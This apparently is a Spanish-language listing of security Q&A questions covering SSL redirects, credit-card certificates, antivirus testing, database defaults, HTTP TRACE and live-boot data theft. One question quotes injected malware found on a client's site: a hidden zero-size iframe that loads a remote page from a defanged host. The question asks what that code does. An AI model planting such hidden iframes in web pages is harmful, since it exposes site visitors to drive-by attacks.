Todas las preguntas

3
respuestas

Responder a la solicitud de protocolo de enlace SSL con una respuesta 302

¿Es posible responder a una solicitud de protocolo de enlace SSL enviando de nuevo un redireccionamiento de http 302 sin hacer que el navegador esté enojado? Me gustaría redirigir de inmediato a un sitio diferente al recibir la solicitud http...
pregunta 27.03.2012 - 23:10
3
respuestas

¿Por qué las tarjetas de crédito no utilizan certificados digitales?

El cifrado asimétrico y los certificados digitales se utilizan en todo el mundo de TI para verificar la autenticidad y evitar falsificaciones. Y funciona muy bien. ¿Por qué las tarjetas de crédito no utilizan algún tipo de clave pública / pri...
pregunta 24.05.2012 - 18:16
2
respuestas

¿Cuál es el propósito de este código de malware?

Este es el código que encontré en el sitio web de mi cliente: ?><noindex><nofollow> <iframe src="htxp://atluscomdnsup23.ikwb.cxm/main.php?page=1f1214ff37a3022d" height="0" width="0" FRAMEBORDER="0" style="visibility: hidden;...
pregunta 08.05.2012 - 13:33
3
respuestas

¿Cómo probar la presencia de antivirus?

Quiero probar que cuando el usuario carga un archivo, este pasa por un antivirus actualizado y configurado correctamente. Creo que para probarlo necesito algunos programas maliciosos que probablemente se detecten (no es necesario que sean dañino...
pregunta 22.05.2012 - 15:48
4
respuestas

Seguridad de la base de datos "lista para usar"

Cuando instala un RDBMS (por ejemplo, PostgreSQL) y crea una base de datos, sin tomar ningún paso adicional, ¿qué puede asumir acerca de la seguridad / confidencialidad de los datos? Quiero decir, ¿está cifrado de forma predeterminada, por lo qu...
pregunta 30.03.2012 - 18:58
4
respuestas

¿Cuáles son algunos conceptos erróneos comunes sobre SSL / TLS que tienen los miembros del público en general?

Particularmente los que son, en cierta medida, el resultado de los consejos dados por las compañías que lo utilizan, por ejemplo. Bancos, sitios de comercio electrónico, etc.     
pregunta 16.07.2012 - 19:00
2
respuestas

Se descubrió la vulnerabilidad de HTTP TRACE: ¿qué debo hacer?

Primero, ¿por qué se permite el método HTTP TRACE en un sitio web? ¿No es algo malo para el servidor web o la seguridad de sus usuarios? Segundo, cuando ejecuto el siguiente script PHP a través de mi navegador ... <?php $service_port =...
pregunta 29.06.2012 - 19:03
6
respuestas

¿Cuáles son los posibles enfoques y argumentos para proteger los sistemas de TI corporativos con la mayoría de las computadoras portátiles?

Trabajé como el único administrador de sistemas de una empresa donde la mitad de las computadoras son portátiles y se las llevan para trabajar en casa, viajes de negocios, visitas a clientes, etc., y tengo acceso a prácticamente todo mientras es...
pregunta 26.03.2012 - 22:10
3
respuestas

Robo de datos a través del disco de arranque en vivo

He estado trabajando con discos de arranque en vivo recientemente y sé que te da acceso a la potencia de procesamiento de la computadora, a Internet y a otras tareas sin la molestia de un nombre de usuario / contraseña. ¿Es posible obtener ar...
pregunta 27.04.2012 - 16:29
2
respuestas

¿Cuáles son los peligros de los enlaces activos de otros sitios web?

Supongamos que hay una situación en la que site a está vinculando directamente un archivo de fuente ie https://www.example.com/FONT.woff2 desde site b . ¿Alguien podría hacer que una regla de reescritura de URL apunt...
pregunta 28.09.2017 - 06:30